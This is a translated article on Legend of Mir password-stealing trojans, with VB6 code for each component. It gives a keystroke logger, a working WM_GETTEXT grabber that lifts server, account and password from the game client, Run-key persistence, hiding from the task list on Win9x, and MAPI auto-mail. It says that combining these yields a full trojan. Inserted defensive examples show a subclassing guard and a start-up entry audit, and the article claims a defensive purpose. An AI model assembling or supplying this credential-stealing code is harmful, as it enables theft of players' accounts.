Analysing Legend of Mir Trojans from a Programming Perspective

Since the Korean online game Legend of Mir (傳奇) entered China in October 2002 it has become increasingly popular, with the number of players growing day by day. At the same time, a class of malicious software known as "Mir trojans" has appeared, such as 傳奇異度靈盜 and 傳奇黑眼. Although these programs work in different ways, they are all designed to steal game accounts and passwords, and a great many players have fallen victim to them. As the saying goes, "know yourself and know your enemy, and you will win every battle". To help readers recognise and guard against this kind of software, this article explains how it works, and how to counter it, from a programming point of view.

Let us start with the keystroke-logging type of Mir trojan. It differs little from an ordinary keylogger, except that before it begins logging it calls the FindWindow API to check whether Legend of Mir is running; if so, it starts logging keystrokes, otherwise it does nothing. The VB declaration of FindWindow is:

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

It returns the handle of the window that matches the given class name (lpClassName) or window name (lpWindowName). To implement keystroke logging most people would think of hook technology, i.e. hooking the user's keystrokes. There is, however, another API function that logs keys just as easily: GetAsyncKeyState, which tests a key identified by its virtual-key code. The return value is a 16-bit integer; if the key has been pressed its most-significant bit is set, i.e. the function returns -32767. Its declaration is:

Private Declare Function GetAsyncKeyState Lib "user32" Alias "GetAsyncKeyState" (ByVal vKey As Long) As Integer

Example:
Dim keyResult As Integer
Dim aKey As String
keyResult = GetAsyncKeyState(13)   ' 13 is the virtual-key code of Enter (VK_RETURN)
If keyResult = -32767 Then
    aKey = "Enter"
End If

Although a keystroke-logging trojan of this kind records every single keystroke a player makes in the game, the account and password usually have to be dug out of a huge log file by careful analysis, which is very time-consuming. The countermeasure is just as simple: when entering your game ID and password, first type 200 arbitrary characters, then clear the input box and enter your real details. Even if somebody gets hold of your keystroke log, don't worry: it will take them two or three years to find your real ID and password!

Another kind of Mir trojan works on an entirely different principle. Its core is the powerful SendMessage function, which, with the help of a few other API functions, grabs the game account and password the player types directly. The related declarations are:

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long
Private Declare Function GetWindow Lib "user32" (ByVal hwnd As Long, ByVal wCmd As Long) As Long
Private Const WM_GETTEXT = &HD
Private Const WM_GETTEXTLENGTH = &HE
Private Const GW_HWNDNEXT = 2


The following code demonstrates how to grab the server the player is on, the game account and the password:

' The declarations of FindWindow, FindWindowEx, SendMessage, GetWindow and the
' WM_/GW_ constants given above must be placed in this form module.
' TexServer, TexPass and TexUser are text boxes on the form; TimMain is a timer.
Private Sub Form_Load()
    TexServer.Text = ""
    TexPass.Text = ""
    TexUser.Text = ""
End Sub

Private Sub TimMain_Timer()
    ' Server selection: a TComboBox inside the window titled "傳奇客戶端"
    Dim HwndServer As Long
    HwndServer = FindWindow(vbNullString, "傳奇客戶端")
    If HwndServer <> 0 Then
        Dim ServerOwner As String, HwndCombo As Long
        ServerOwner = "TComboBox"
        HwndCombo = FindWindowEx(HwndServer, 0, ServerOwner, vbNullString)
        If HwndCombo <> 0 Then
            ' Ask the control for its text length, then copy its text into a buffer
            Dim SevLength As Long, SevCon As String
            SevLength = SendMessage(HwndCombo, WM_GETTEXTLENGTH, 0, 0)
            SevLength = SevLength + 1
            SevCon = Space$(SevLength)
            SendMessage HwndCombo, WM_GETTEXT, SevLength, ByVal SevCon
            TexServer.Text = SevCon
        End If
    End If
    ' Login window: the first TEdit child is the password box
    Dim HwndMain As Long
    HwndMain = FindWindow(vbNullString, "legend of mir2")
    If HwndMain <> 0 Then
        Dim PassOwner As String, HwndPass As Long
        PassOwner = "TEdit"
        HwndPass = FindWindowEx(HwndMain, 0, PassOwner, vbNullString)
        If HwndPass <> 0 Then
            Dim PassLength As Long, PassCon As String
            PassLength = SendMessage(HwndPass, WM_GETTEXTLENGTH, 0, 0)
            PassLength = PassLength + 1
            PassCon = Space$(PassLength)
            SendMessage HwndPass, WM_GETTEXT, PassLength, ByVal PassCon
            TexPass.Text = PassCon
            ' The account box is the next sibling window after the password box
            Dim HwndUser As Long, UserLength As Long, UserCon As String
            HwndUser = GetWindow(HwndPass, GW_HWNDNEXT)
            If HwndUser <> 0 Then
                UserLength = SendMessage(HwndUser, WM_GETTEXTLENGTH, 0, 0)
                UserLength = UserLength + 1
                UserCon = Space$(UserLength)
                SendMessage HwndUser, WM_GETTEXT, UserLength, ByVal UserCon
                TexUser.Text = UserCon
            End If
        End If
    End If
End Sub


The code above implements a simple grabber and only runs on Win9x; WinNT/2000 do not allow different processes to access each other's data, so other APIs have to be used to set up a shared data area.

For ordinary players, guarding against this kind of software is fairly hard. The best approach is to add code to the Mir client itself that, while the user is entering data, checks whether some other window is sending messages to the account and password boxes and responds accordingly, in other words a guard against SendMessage. There is plenty of such code on the net, and the Korean programmers capable of writing Legend of Mir are surely no amateurs, so I will not presume to teach them their business.
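As an added example of the guard just described (it is not the article's code and not the Legend of Mir client's own code), the VB6 standard module below subclasses a password text box and refuses WM_GETTEXT and WM_GETTEXTLENGTH requests that arrive from another thread or process. It assumes a form with a text box named TxtPass; the procedure names GuardPasswordBox, UnguardPasswordBox and GuardProc and the counter BlockedReads are hypothetical. The check relies on the Win32 function InSendMessage, which returns non-zero only while the window procedure is handling a message that a different thread delivered with SendMessage, so the form's own reads of the .Text property keep working while a grabber like the one above gets back an empty result.

```vb
' Added example (not from the article): guard a password text box against
' cross-process WM_GETTEXT reads by subclassing its window procedure.
Option Explicit

Private Declare Function SetWindowLong Lib "user32" Alias "SetWindowLongA" _
    (ByVal hWnd As Long, ByVal nIndex As Long, ByVal dwNewLong As Long) As Long
Private Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" _
    (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, _
     ByVal wParam As Long, ByVal lParam As Long) As Long
' Non-zero while handling a message that another thread sent with SendMessage.
Private Declare Function InSendMessage Lib "user32" () As Long

Private Const GWL_WNDPROC As Long = -4
Private Const WM_GETTEXT As Long = &HD
Private Const WM_GETTEXTLENGTH As Long = &HE

Private m_hWndGuarded As Long   ' handle of the protected text box (hypothetical name)
Private m_PrevProc As Long      ' original window procedure of that text box
Public BlockedReads As Long     ' number of refused foreign reads, for logging or alerts

' Install the guard, e.g. GuardPasswordBox TxtPass.hWnd in Form_Load.
Public Sub GuardPasswordBox(ByVal hWnd As Long)
    If m_PrevProc <> 0 Then Exit Sub          ' already installed
    m_hWndGuarded = hWnd
    m_PrevProc = SetWindowLong(hWnd, GWL_WNDPROC, AddressOf GuardProc)
End Sub

' Restore the original procedure; call from Form_Unload before the window is destroyed.
Public Sub UnguardPasswordBox()
    If m_PrevProc = 0 Then Exit Sub
    SetWindowLong m_hWndGuarded, GWL_WNDPROC, m_PrevProc
    m_PrevProc = 0
    m_hWndGuarded = 0
End Sub

' Replacement window procedure for the guarded text box.
Public Function GuardProc(ByVal hWnd As Long, ByVal uMsg As Long, _
                          ByVal wParam As Long, ByVal lParam As Long) As Long
    Select Case uMsg
        Case WM_GETTEXT, WM_GETTEXTLENGTH
            If InSendMessage() <> 0 Then
                ' A foreign thread is asking for the password text: report a
                ' zero length, leave the caller's buffer untouched, and record it.
                BlockedReads = BlockedReads + 1
                GuardProc = 0
                Exit Function
            End If
    End Select
    ' Everything else, including the form's own reads, goes to the original procedure.
    GuardProc = CallWindowProc(m_PrevProc, hWnd, uMsg, wParam, lParam)
End Function
```

Call GuardPasswordBox TxtPass.hWnd in Form_Load and UnguardPasswordBox in Form_Unload: a subclassed VB6 window must be restored before it is destroyed, and stopping the program from the IDE with the subclass still installed crashes the IDE. BlockedReads gives the client a counter it can show to the player or write to a log, which turns a silent theft into a visible event. Later versions of Windows already refuse cross-process WM_GETTEXT on edit controls that carry the password style, so a guard of this kind matters most for the Win9x-era client the article discusses.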
That concludes the analysis of the core functions of the various Mir trojans; next, let us look at their other functions.

1. Automatic start at boot
Private Declare Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function RegSetValueEx Lib "advapi32.dll" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Const REG_SZ = 1
Const HKEY_LOCAL_MACHINE = &H80000002

' Copy the program into the system directory and register it under the Run key
Private Sub InstallAutorun()
    FileCopy "test.exe", "c:\windows\system\test.exe"
    SetMyValue HKEY_LOCAL_MACHINE, "Software\Microsoft\Windows\CurrentVersion\Run", _
               "wing", "c:\windows\system\test.exe"
End Sub

' Create (or open) the key strPath under hKey and write the string value strValue = strData
Sub SetMyValue(hKey As Long, strPath As String, strValue As String, strData As String)
    Dim keyHandle As Long
    Dim lResult As Long
    lResult = RegCreateKey(hKey, strPath, keyHandle)
    lResult = RegSetValueEx(keyHandle, strValue, 0, REG_SZ, ByVal strData, Len(strData))
    lResult = RegCloseKey(keyHandle)
End Sub


The example above achieves auto-start through the registry. But I cannot guarantee that every such program uses this method; it might instead modify Autoexec.bat, winstart.bat or win.ini, or even load a DLL dynamically.
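As an added example, not part of the article, the VB6 module below audits two of the start-up locations just named: the Run keys under HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER (through RegOpenKeyEx and RegEnumValue) and the run= and load= lines of win.ini (through GetProfileString). It takes a snapshot as text and reports entries that were absent from an earlier snapshot, which is the baseline-and-diff check a player or administrator can run after installing anything. The function names SnapshotRunKeys, NewRunEntries, ReadRunKey and ReadWinIniStarts are hypothetical. With the article's sample installed, the report would contain the line HKLM\wing=c:\windows\system\test.exe.

```vb
' Added example (not from the article): snapshot the Run keys and win.ini
' start-up lines, and report entries that a baseline snapshot did not contain.
Option Explicit

Private Declare Function RegOpenKeyEx Lib "advapi32.dll" Alias "RegOpenKeyExA" _
    (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, _
     ByVal samDesired As Long, phkResult As Long) As Long
Private Declare Function RegEnumValue Lib "advapi32.dll" Alias "RegEnumValueA" _
    (ByVal hKey As Long, ByVal dwIndex As Long, ByVal lpValueName As String, _
     lpcbValueName As Long, ByVal lpReserved As Long, lpType As Long, _
     lpData As Byte, lpcbData As Long) As Long
Private Declare Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Private Declare Function GetProfileString Lib "kernel32" Alias "GetProfileStringA" _
    (ByVal lpAppName As String, ByVal lpKeyName As String, ByVal lpDefault As String, _
     ByVal lpReturnedString As String, ByVal nSize As Long) As Long

Private Const HKEY_LOCAL_MACHINE As Long = &H80000002
Private Const HKEY_CURRENT_USER As Long = &H80000001
Private Const KEY_READ As Long = &H20019
Private Const ERROR_SUCCESS As Long = 0
Private Const RUN_KEY As String = "Software\Microsoft\Windows\CurrentVersion\Run"

' One "ROOT\name=data" line per value under the Run key of the given root.
Private Function ReadRunKey(ByVal hRoot As Long, ByVal rootName As String) As String
    Dim hKey As Long, idx As Long
    Dim valueName As String, nameLen As Long
    Dim data() As Byte, dataLen As Long, dataType As Long
    Dim text As String, lines As String

    If RegOpenKeyEx(hRoot, RUN_KEY, 0, KEY_READ, hKey) <> ERROR_SUCCESS Then Exit Function
    Do
        valueName = Space$(255): nameLen = 255
        ReDim data(0 To 4095): dataLen = 4096
        If RegEnumValue(hKey, idx, valueName, nameLen, 0, dataType, data(0), dataLen) _
           <> ERROR_SUCCESS Then Exit Do          ' ERROR_NO_MORE_ITEMS ends the loop
        ' For REG_SZ data the returned byte count includes the terminating NUL.
        text = StrConv(data, vbUnicode)
        If dataLen > 0 Then text = Left$(text, dataLen - 1) Else text = ""
        lines = lines & rootName & "\" & Left$(valueName, nameLen) & "=" & text & vbCrLf
        idx = idx + 1
    Loop
    RegCloseKey hKey
    ReadRunKey = lines
End Function

' win.ini [windows] run= and load= lines also start programs at logon on Win9x.
Private Function ReadWinIniStarts() As String
    Dim keyName As Variant, buf As String, n As Long
    For Each keyName In Array("run", "load")
        buf = Space$(1024)
        n = GetProfileString("windows", CStr(keyName), "", buf, Len(buf))
        If n > 0 Then
            ReadWinIniStarts = ReadWinIniStarts & "WIN.INI\" & keyName & "=" & Left$(buf, n) & vbCrLf
        End If
    Next
End Function

' Text snapshot of all audited start-up locations; save it to a file as the baseline.
Public Function SnapshotRunKeys() As String
    SnapshotRunKeys = ReadRunKey(HKEY_LOCAL_MACHINE, "HKLM") & _
                      ReadRunKey(HKEY_CURRENT_USER, "HKCU") & _
                      ReadWinIniStarts()
End Function

' Lines present in current but absent from baseline; empty string when nothing is new.
Public Function NewRunEntries(ByVal baseline As String, ByVal current As String) As String
    Dim entry As Variant, result As String
    For Each entry In Split(current, vbCrLf)
        If Len(entry) > 0 Then
            ' Match whole lines only, so "wing=" cannot hide behind a longer baseline line.
            If InStr(1, vbCrLf & baseline, vbCrLf & entry & vbCrLf, vbTextCompare) = 0 Then
                result = result & entry & vbCrLf
            End If
        End If
    Next
    NewRunEntries = result
End Function
```

Save SnapshotRunKeys() to a file while the machine is known to be clean; later, NewRunEntries(savedText, SnapshotRunKeys()) lists what has been added, and any unexplained entry pointing into the system directory deserves a look before the next game session. The article also mentions Autoexec.bat and winstart.bat; those are plain text files and can be hashed and compared in the same baseline-and-diff manner.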

2. Hiding
This means not appearing in the task list; the Win9x implementation is as follows:
Private Declare Function GetCurrentProcessId Lib "kernel32" () As Long
' Returns a unique identifier for the current process.
Private Declare Function RegisterServiceProcess Lib "kernel32" (ByVal dwProcessID As Long, ByVal dwType As Long) As Long
' Registers or unregisters the process with ID dwProcessID as a "service" process (Win9x only).
' Constant used: this is the value passed as dwType.
Const RSP_SIMPLE_SERVICE = 1

Private Sub HideFromTaskList()
    Dim pid As Long, regserv As Long
    ' Get the current process ID
    pid = GetCurrentProcessId()
    ' Register it as a service process so that it no longer shows in the task list
    regserv = RegisterServiceProcess(pid, RSP_SIMPLE_SERVICE)
End Sub
Finally, the automatic mail-sending function. There are many ways to do this: VB's own MAPI controls, the API, or third-party controls.
Taking the MAPI controls sending a single message as an example:
MAPISession1.SignOn
With MAPIMessages1
    .SessionID = MAPISession1.SessionID
    .MsgIndex = -1            ' -1 selects the compose buffer for a new message
    .RecipDisplayName = "test"
    .MsgSubject = "test2"
    .MsgNoteText = "test3"
    .Send
End With


Combining all the pieces of code above yields every basic function of a Mir trojan. The code in this article is given only so that readers can better understand how these programs work and defend against them more effectively; I hope everyone uses it responsibly.
